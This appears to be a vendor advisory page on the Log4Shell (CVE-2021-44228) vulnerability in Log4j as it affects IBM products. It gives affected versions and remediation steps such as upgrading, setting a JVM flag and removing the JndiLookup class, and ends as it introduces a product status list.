IBM Products and the Log4j security vulnerability

On December 9th, 2021, a critical security vulnerability was found in the Log4j logging utility. Log4j is a widely used open-source utility used to generate log messages from Java applications.  The vulnerability CVE-2021-44228 , also known as Log4Shell or LogJam, permits a Remote Code Execution (RCE) allowing attackers to execute arbitrary code loaded from an attacker-controlled LDAP server when message lookup substitution is enabled in Log4j.  

The Log4j utility is used in some of the applications written by Genus as well as many of the products Genus specializes in.  Almost all versions of Log4j Version 2 are susceptible: 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0.  Log4j Version 1.x is not vulnerable to this exploit but does have exposure to other security vulnerabilities.

Several patches of Log4j were released from December 2021 - February 2022 that addressed these vulnerabilities.

 

A quick way to assess if you are impacted by this CVE is to search the file systems of your servers for “log4j-core-2.*.jar”.

If you’re impacted by this CVE, remediation options include:

1. Preferably, upgrade to a patched version of the software that includes Log4j 2.17.2 or higher
2. Replace the log4j-core-2.x.jar with the new log4j-core-2.17.2.jar. You may need to update references to this .jar in manifest.mf and other files.
3. If the application is using Log4j 2.10 or higher, add the JVM argument

             -Dlog4j.formatMsgNoLookups=true

         To disable Log4j message lookup substitution.

4. Remove the JndiLookup class from the jar file manually:

               zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

 

Below is a list of IBM products, their vulnerability status, suggested remediation, and links to find more information.